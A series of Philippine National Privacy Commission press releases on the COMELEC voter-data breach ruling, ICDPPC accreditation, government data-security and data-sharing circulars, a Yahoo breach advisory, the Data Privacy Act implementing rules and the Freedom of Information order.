Through the series of DPO assemblies, the NPC wants to professionalize the DPO practice in the country to world-class standards. Since data protection issues vary across sectors and industries, however, the Commission decided on a targeted communication approach. After DPO1, the NPC shall prepare for the next round of DPO meets for other sectors such as banking and financial institutions, BPOs, academic institutions, and health care services.
About The Commission: The NPC is a regulatory and quasi-judicial body established in March 2016 by virtue of RA 10173, otherwise known as the Data Privacy Act of 2012. Headed by one commissioner and two deputy commissioners, the agency is mandated to uphold the right to data privacy and ensure the free flow of information, with a view to promoting economic growth and innovation.
-
Privacy Commission recommends criminal prosecution of Bautista over “Comeleak”
Comments Off on Privacy Commission recommends criminal prosecution of Bautista over “Comeleak”The National Privacy Commission (NPC) has found that the Commission on Elections (COMELEC) violated the Data Privacy Act of 2012 and has recommended the criminal prosecution of Chairman J. Andres D. Bautista for the data breach that occurred between 20 and 27 of March last year.
In its decision dated December 28, 2016 on NPC Case No. 16-001, the NPC underscored Bautista’s “lack of appreciation”of the principle that data protection is more than just implementation of security measures. “Data privacy is more than the deployment of technical security; it also includes the implementation of physical and organizational measures, as well as regular review, evaluation, and updating of COMELEC’s privacy and security policies and practices,” the decision reads.
The NPC said the COMELEC “violated Sections 11, 20 and 21 of the Republic Act No. 10173” in the dispense of the agency’s duty as “personal information controller.” The document, meanwhile, mentioned Chairman Bautista as having “violated the provisions of Section 11, 20, 21 and 22 in relation to Section 26” of the same law.
Section 26 of the Data Privacy Act, which penalizes accessing sensitive personal information due to negligence, imposes imprisonment from 3 to 6 years and a fine from P500,000 to P4,000,000. Meantime, Section 36 accords additional penalties when the offender is a public officer, consisting in the disqualification from public office for a period equivalent to double the term of criminal penalty.
“The personal data in the breach is contained in several databases kept in the website: (a) the voter database in the Precinct Finder web application, containing 75,302,683 records; (b) the voter database in the Post Finder web application, which contains 1,376,067 records; (c) the iRehistro registration database, with 139,301 records; (d) the firearms ban database, containing 896,992 personal data records and 20,485 records of firearms serial numbers; and (e) the COMELEC personnel database, containing records of 1,267 COMELEC personnel,” the document reads, making the incident the worst recorded breach on a government-held personal database in the world, based on sheer volume.
Further illustrating the breadth of the breach, the NPC decision also gave a rundown of what types of compromised sensitive personal information were contained in COMELEC’s two web-based applications.
“The voter database in the Precinct Finder application contained each voter’s complete name, date of birth, gender, civil status, address, precinct number, birthplace, disability, voter identification number, voter registration record number, reason for deletion/deactivation, registration date, and update time.”
“The voter database in the Post Finder application contained information on each voter’s verified name, date of birth, gender, civil status, post of registration, passport information, with number and expiry date, taxpayer identification number, e-mail address, mailing address, spouse’s name, the complete names of the voter’s mother and father, the voter’s addresses in the Philippines and abroad, post or country of registration, old registration information, Philippine representative’s complete name, citizenship, registration assistor, profession, sector, height and weight, identifying marks, biometrics description, voting history, mode of voting, and other textual reference information for the voter registration system,” the decision further reads, depicting how much personal data are now most likely in the hands of criminal elements as a result of the COMELEC data breach.
Referring to Bautista, the NPC decision reads, “the willful and intentional disregard of his duties as head of agency, which he should know or ought to know, is tantamount to gross negligence. The lack of a clear data governance policy, particularly in collecting and further processing of personal data, unnecessarily exposed personal and sensitive information of millions of Filipinos to unlawful access.
“A head of agency making his acts depend on the recommendations of the Executive Director or the Information Technology Department amplifies the want of even slight care. The duty to obey the law should begin at the top and should not be frustrated simply because no employee recommended such action,” the NPC decision further reads.
As corrective measures, the NPC has ordered the COMELEC and Chairman Bautista to do the following:
Appoint a Data Protection Officer in one month’s time from receipt of the decision. Conduct an agency-wide Privacy Impact Assessment within two months. Create a Privacy Management Program and a Breach Management Procedure within three months. Within six months upon receipt of the decision, the COMELEC is also obliged to implement organizational, physical and technical security measures in compliance with the Implementing Rules and Regulations of the Data Privacy Act and the provisions of NPC Circular No. 16-01, on Security of Personal Data in Government Agencies.
The NPC has also recommended to the Secretary of Justice “further investigation for possible prosecution” under the Cybercrime Prevention Act, having found that one of the computers used in the COMELEC data breach had an IP address registered with the National Bureau of Investigation (NBI).
About the NPC: The National Privacy Commission is a regulatory and quasi-judicial body created in March 2012 by virtue of RA 10173, otherwise known as the Data Privacy Act of 2012. Headed by one commissioner and two deputy commissioners, the agency is mandated to uphold the right to data privacy and ensure the free flow of information, with a view to promoting economic growth and innovation.
Contact Person: Atty. Rashy Rellosa – [email protected]
###
-
PH Privacy Commission gets international accreditation
Comments Off on PH Privacy Commission gets international accreditationPH National Privacy Commission approved as full member of the International Conference of Data Protection and Privacy Commissioners (ICDPPC) . Out of 12 data privacy authorities from as many countries that applied for membership this year, the Philippines was only one of five approved for full membership, meeting ICDPPC’s stringent standards for data protection and privacy. In the photo are (from left to right); Privacy Commissioner Raymund Enriquez Liboro (Philippines); Director General Patricia Kosseim of the Office of the Privacy Commissioner, Canada; Mr. John Edwards Privacy Commissioner of New Zealand and Chairman of ICDPPC Executive Committee; and Deputy Commissioner Dondi Mapa (Philippines) at a recent ICDPPC event held in Marrakech, Morocco . The Philippines' newly formed data protection and privacy authority, The National Privacy Commission (NPC) has received international recognition for its data protection regime from several notable international authorities. The NPC was formed on March 7, 2016.
The National Privacy Commission (NPC) received its accreditation as a member of the organization from the International Conference of Data Protection and Privacy Commissioners (ICDPPC). The accreditation from ICDPPC signifies that a country’s Data Protection agency meets stringent standards. Only 5 out of the 12 applications were approved by the ICDPPC Executive Committee this year. The ICDPPC has been the premier global forum for data protection authorities for 40 years, providing global leadership in data protection and privacy by connecting the efforts of over 110 privacy and data protection authorities from around the world.
NPC Commissioner Raymund E. Liboro was pleased with the recognition of the Commission’s efforts to upgrade the standards of privacy and data protection in the Country. “Admission to the ICDPPC augurs well for the Philippines. It recognizes that we are committed to international standards in protecting personal data and privacy in the Country, and that the Commission is viewed as independent and vested with the authority to do so.” Commissioner Liboro said.
Earlier last month, the Hogan Lovells Chronicle on Data Protection published an article on their website featuring the release of the Implementing Rules and Regulations (IRR) of the Data Privacy Act of 2012 (R.A. 10173) the article mentioned that “the IRRs represent a significant development in data privacy regulation in the Philippines, and will affect multi-national businesses that use or provide services in or from the Philippines, as well as local vendors with data processing facilities in the Philippines. It is fair to say that the IRRs set one of the higher bars for compliance standards in the Asia-Pacific region.”
This is good news for the Information Technology – Business Process Management (IT-BPM) industry as it reinforces the Philippines’ reputation as an ideal IT-BPM destination. Benedict Hernandez, from the Information Technology and Business Process Association of the Philippines (IBPAP), shares that it can be expected for more companies to prefer the Philippines over other countries given the fact that our Data Privacy Standards meet International Standards.
About the National Privacy Commission - The National Privacy Commission is the country’s privacy watchdog; an independent body mandated to administer and implement the Data Privacy Act of 2012, and to monitor and ensure compliance of the country with international standards set for data protection.
Contact Person: Michelle Saquido - [email protected]
-
Government Open Data to Improve with Data Sharing Directives
Comments Off on Government Open Data to Improve with Data Sharing DirectivesThe free flow of information within the government is expected to improve with the issuance of the latest memorandum circular of the National Privacy Commission’s (NPC). (NPC MC 16-02) on Data Sharing Agreements Involving Government Agencies.
This issuance from the NPC reinforces its mandate to support the free flow of information and safeguard the right to privacy of information. National Privacy Commissioner Raymund Enriquez Liboro said that the law was intended to strike a balance between the need for information freedom and data privacy as indispensable components of nation building. He stated further that the “Freedom of Information is more than just access requests to government, it is about responsible data sharing. Open data will contribute significantly to improving government services and coming up with new ones, supporting innovation and growth.”
The Freedom of Information (FoI) Executive Order was recently issued by the government, and the privacy commission clarified that the Data Privacy Act (DPA) cannot be used as a shield against FoI. It pointed out that the DPA is for the protection of any personal data that may be contained in government records that is not relevant to the Freedom of Information request, particularly when it affects private citizens.
The government is considered the largest collector and repository of personal data. E-governance initiatives and innovations in public services allow for citizens to avail of these services online, eliminating the need to queue up or having to fill out paper-based forms with personal data that the government already has.
The Data Sharing Issuance requires that personal information controllers (government agencies) to implement safeguards for data sharing. These include adhering to data privacy principles, entering into Data Sharing Agreements, reviewing technical security measures when allowing online access, and providing for the return, destruction or disposal of transferred personal data. Violation of directives contained in the issuance may lead to sanctions.
About the National Privacy Commission - The National Privacy Commission is the country’s privacy watchdog; an independent body mandated to administer and implement the Data Privacy Act of 2012, and to monitor and ensure compliance of the country with international standards set for data protection.
Contact Person: Michelle Saquido - [email protected]
-
Stricter government handling of personal data ordered in Privacy Commission issuance
Comments Off on Stricter government handling of personal data ordered in Privacy Commission issuancePersonal data in the hands of government offices and all branches of government including state-run schools and colleges are expected to be made more secure with the issuance of the National Privacy Commission’s (NPC) first memorandum circular (#16-001) on the “Security of Personal Data in Government”. According to Commissioner Raymund E. Liboro, the circular is about “preventing and mitigating potential data breaches.” He supplements this with the importance of “heightened awareness and setting the appropriate security measures will lower the risk of security incidents and breach.”
As part of its mandate to provide public services, the government holds personal data of its citizen, as well as visitors from other countries. In fact, the government is considered to be the biggest repository and collector of personal data. With more and more services becoming more available online and with the increasing prevalence of cybercrimes like identity theft and hacking, it is vital that personal data of citizens be kept secure.
Among the obligations of government agencies contained in NPC Memorandum Circular 16-01 is the designation of a Data Protection Officer, the conduct of a Privacy Impact Assessment for processes that use personal data. The circular also obliges government agencies to create privacy policies, conduct regular training on privacy policies for its employees and contractors, and register data processing systems that process personal data of at least one thousand (1,000) individuals. The circular likewise outlines rules on the storage, access, transfer, and disposal of personal data in government IT systems.
Compliance of government institutions to this latest issuance by the NPC means that there will be less incidences of personal data breach like the one that happened to COMELEC in March this year, wherein millions of voter records were compromised. “Lessons from the incident and consultations with government agencies themselves through the CIO Forum (a nationwide association of government CIO’s) guided us in drafting the circular,” Liboro said.
Commissioner Liboro is confident that government institutions will be able to comply with the NPC’s memorandum circular. “The responsible processing of personal data is a vital component of e-government which is a major thrust of the Duterte Administration. As more and more government records are digitized and services go online, we must make sure that citizen’s personal data is kept secure. It should be a top priority,” he added.
About the National Privacy Commission - The National Privacy Commission is the country’s privacy watchdog; an independent body mandated to administer and implement the Data Privacy Act of 2012, and to monitor and ensure compliance of the country with international standards set for data protection.
# # #
Contact Person: Michelle Saquido - [email protected]
PDF version: pr-privacy-gov-ph-stricter-government-handling-of-personal-data-ordered-in-privacy-commission-issuance
-
Privacy Commission Advisory on Yahoo Breach
Comments Off on Privacy Commission Advisory on Yahoo BreachPhoto/Graphic Source: money.cnn.com The National Privacy Commission (NPC) would like to reiterate the recommendations of Yahoo and cybersecurity experts to Yahoo users to change their passwords on their Yahoo accounts.
This follows after the compromise of half a billion user accounts from Yahoo’s servers in 2014 that was only discovered and confirmed by Yahoo this week. Below is what was posted on Yahoo’s email log-in page about the Account Security issue :
"We have confirmed, based on a recent investigation, that a copy of certain user account information was stolen from our network in late 2014 by what we believe is a state-sponsored actor. The account information may have included names, email addresses, telephone numbers, dates of birth, hashed passwords (the vast majority with bcrypt) and, in some cases, encrypted or unencrypted security questions and answers."
Other than changing Yahoo log-in credentials, the NPC also recommends that Yahoo users change log-in credentials of their other online accounts where they might have used their Yahoo email for account verification purposes. The security questions on Yahoo might also have been compromised and it would be a good idea to revise the security questions or disable that feature. The NPC also recommends activating two-part authentication to gain first time access to your account. Two-part authentication uses a phone number you provided to verify your identity.
According to Privacy Commissioner Raymund Enriquez Liboro, “A compromised email account can be an avenue for a hacker to gain access to other personal online accounts of an individual, from social media sites to on-line payment portals. That is why it is important to maintain good password hygiene, use pass phrases with numbers or special characters instead of single words, take note of log-in attempts into your account/s that weren’t initiated by you, and change your password/s two to three times a year, or as many times as you change your toothbrush.”
It was revealed at a Microsoft Cybersecurity Summit for government agencies that it takes an average of 502 days for system administrators to detect a security breach.
About the National Privacy Commission - The National Privacy Commission is an independent body mandated to administer and implement the Data Privacy Act of 2012, and to monitor and ensure compliance of the country with international standards set for data protection.
-
Privacy Act IRR released – NPC to educate public about privacy
Comments Off on Privacy Act IRR released – NPC to educate public about privacyPhoto 1: (From Left to Right) Deputy Privacy Commissioner Dondi Mapa, Deputy Privacy Commissioner Ivy Patdu, and Privacy Commissioner and Chairman Raymund E. Liboro listened to inputs from health information and research stakeholders at a public consultation on R.A. 10173's Implementing Rules and Regulations / Photo courtesy of Ramon Duremdes Jr. The Implementing Rules and Regulations (IRR) of Republic Act 10173 or the Data Privacy Act (DPA) of 2012 was officially submitted to the Presidential Communications Office (PCO) for publication on the Official Gazette by the National Privacy Commission (NPC) after several months of public consultations nationwide with various stakeholders. The IRR will officially take effect fifteen (15) days after its publication.
Civil Society organization, Foundation for Media Alternatives (FMA) was instrumental in organizing Public Consultations for the Implementing Rules. According to FMA Director Alan Alegre, “The FMA is pleased with the spirit of inclusive participation of stakeholders in the development of the DPA’s IRR. Kudos to all stakeholders who participated in the public consultations, submitted comments online and offline, and produced position papers.”
Personal Information Controllers and other stakeholders participated in five public consultations and several meetings with the NPC. These stakeholders included representatives from banks, retail, education, research, health Informatics, civil society, business process management, migrant sectors, and Government organizations. Among the organizations that helped organize public consultations were the Philippine Computer Society, U.P Office of the Vice Chancellor for Research and Development (OVCRD), Department of Health, Philippine Council for Health Research and Development, Ateneo de Davao University, UP-PGH, National Telehealth Center and the Foundation for Media Alternatives (FMA).
The NPC will focus on conducting public information campaigns aimed at educating the public and organizations on the importance of data privacy in its first year of operations.
According to Privacy Commissioner Raymund Liboro, “With the prevalent use of personal data in access devices, social media, and smartphone apps, as well as in the delivery of basic services, it is extremely important that the public and organizations be made aware of the need to responsibly handle personal information,” Commissioner Liboro explains.
“The IRR was made with the citizen’s protection and the country’s progress in mind,” emphasized Commissioner Liboro. “Personal data is an important part of your personal assets and should be guarded. Collectively, they become a national asset too.”
The Data Privacy Act applies in general to any person or organization, whether from the government or private sector, that is involved in the collection, processing and any further use of personal data. Personal data is any information that may identify a person, such as names, identification numbers, and personal circumstances. It may involve sensitive information such as contents of a medical record, which a person normally does not intend to disclose to the public.
According to Chairman Liboro, “Everyone must be aware of how to secure them from threats. The Data Privacy Act was enacted to build trust on the country’s ICT systems. To make sure every Filipino benefits from ICT and not to fall victims to data use negligence and internet abuse.”
The National Privacy Commission is hopeful that they will get full cooperation from industry, government, civil society groups and other stakeholders on the conduct of its public information campaign and other activities.
Deputy Commissioner Ivy Patdu said, “To truly embrace a culture of privacy requires multi-sectoral coordination. The Commission has a big job ahead and the support and cooperation of various industries and Government will go a long way in protecting personal data.”
She furthers, “Privacy is a fundamental human right. Promoting free flow of information should not be seen as incompatible with upholding the right to information privacy. We just need to realize that the benefits gained from use of personal data comes with a duty of respecting rights of data subjects.”
-
27 July 2016 version of the Proposed IRR
Comments Off on 27 July 2016 version of the Proposed IRRFor the upcoming public consultation in Cebu this July 28, 2016, and those interested in seeing the latest version of the proposed implementing rules and regulations (IRR) of the Data Privacy Act of 2012 (R.A. 10173). you can download the copy through this link: IRR Version 072716.pdf
-
Data Privacy Act. IRR Public Consultation - Cebu, 28 July 2016
Comments Off on Data Privacy Act. IRR Public Consultation - Cebu, 28 July 2016
This might be your last chance for a face to face public consultation on the IRR. This one will happen in Cebu. for those who can't make it, feel free to send us an email at [email protected]
Register for the pubcon here: http://bit.ly/2acM0lc
Access the draft IRR here: http://www.gov.ph/2016/06/20/irr-data-privacy-act-2012/
Access the E.O.10173 or the Data Privacy Act of 2012 here: http://www.gov.ph/2012/08/15/republic-act-no-10173/
for more information you can contact the Foundation for Media Alternatives at [email protected] or +632 435-6684 -
National Privacy Commission Position on FOI EO
Comments Off on National Privacy Commission Position on FOI EOThe National Privacy Commission lauds the signing of the Executive Order on the Freedom of Information as an important step towards greater transparency and people’s participation in government. The right to information on matters of public concern is a fundamental right provided in the Constitution and the right to privacy must always be balanced with the right of the people to be provided information on matters that affect their lives. The Executive Order was well-written to observe these two fundamental rights.
Freedom of information is emphasized in both the Data Privacy Act (RA 10173), and its proposed Implementing Rules and Regulations. We affirm that the Data Privacy Act should not be used to restrict access to information that fall within matters of public concern. Primarily, the Data Privacy Act does not apply to government officers and employees relating to their functions and positions, personal data in relation to government contracts and discretionary benefits given by government.
A government official who abuses his position or takes undue advantage of his functions for personal benefit will not be able to use the Data Privacy Act to restrict access of the people to information.
The protection of privacy is emphasized in Section 7 of the FOI -EO. This is not intended to shield government officials. Rather, this is for the protection of any personal data that may be contained in government records that is not relevant to the freedom of information request, particularly when it affects private citizens.
For example, it is easy to imagine request of public records from Philhealth (Philippine Health Insurance Corporation) with regard to its operations including contracts it entered into, but this does not mean that names and diseases of patients should be disclosed or published to anyone requesting access. In the same way, an official or employee of the government with access to personal data does not have the right or the authority to disclose it to just anyone. By law, he or she is mandated to protect personal information from unauthorized access or breach in order to protect the privacy of its citizens.
As an added example, public officers and employees are required by law to respect the privacy of victims of violence against women and their children and records of these cases shall be confidential. Therefore, Section 7 should not be viewed as restricting the freedom information upheld by the Executive Order. It defined information and public records broadly, which would include all government records, even those containing personal data of citizens. Section 7 is a recognition of the responsibility of government to protect personal data under its custody, and gives due regard to the equally important right to privacy.
The Executive Order of President Rodrigo R. Duterte makes a public declaration and a commitment that Filipinos shall have access to information, official and public records, and documents being held by the government. The National Privacy Commission supports this declaration. If only to emphasize, the Data Privacy Act shall not be used to restrict access to information that fall within matters of public concern. Freedom of information is not incompatible with the right to privacy.
-
Data Privacy Act Cannot Be Used As Shield Against FOI
Comments Off on Data Privacy Act Cannot Be Used As Shield Against FOIThe Data Privacy Act of 2012 cannot be used by government officials as protection against the Freedom of Information Executive Order issued by President Duterte last week, this was said by the Data Privacy Commission” in a position paper in reaction to concerns that the Data Privacy Act will be used by Government Officials to deny access to information.
In the Position Paper the Data Privacy Commission said that, “A government official who abuses his position or takes undue advantage of his functions for personal benefit will not be able to use the Data Privacy Act to restrict access of the people to information”
It also added that Data Privacy Section (7) of the FOI Executive Order, is not intended to shield government officials but is for the protection of any personal data that may be contained in government records that is not relevant to the freedom of information request, particularly when it affects private citizens.”
Section 7 should not be viewed as restricting the freedom information upheld by the Executive Order. It defined information and public records broadly, which would include all government records, even those containing personal data of citizens. Section 7 is a recognition of the responsibility of government to protect personal data under its custody, and gives dueregard to the equally important right to privacy.
According to Data Privacy Commissioner Raymund Liboro, “We laud the signing of the Executive Order on the Freedom of Information as an important step towards greater transparency and people’s participation in government. The right to information on matters of public concern is a fundamental right provided in the Constitution and the right to privacy must always be balanced with the right of the people to be provided information on matters that affect their lives. The Executive Order was well-written to observe these two fundamental rights”. Commissioner Liboro Said.
About the National Privacy Commission
- The National Privacy Commission is an independent body mandated to administer and implement the Data Privacy Act of 2012, and to monitor and ensure compliance of the country with international standards set for data protection.###
-
Invitation to Comment: Proposed Implementing Rules and Regulations of The Data Privacy Act
Comments Off on Invitation to Comment: Proposed Implementing Rules and Regulations of The Data Privacy ActThe Data Privacy Act of 2012 is the law for the protection of individual personal information in information and communications system in both government and private sector. We recognize the need to support the free flow of information for national development, while safeguarding the fundamental right of every individual to privacy.
The National Privacy Commission is currently finalizing the implementing rules and regulations of Data Privacy Act of 2012. We call on your participation through the submission of your views, position papers or recommendations on the proposed Rules. Please send us your comments through: [email protected]
It is our hope that we work together towards the common goal of promoting a privacy culture in our country, with due regard for the role of information and communication technology in nation building.You can download the latest draft version of the IRR here: updated draft July 12 2016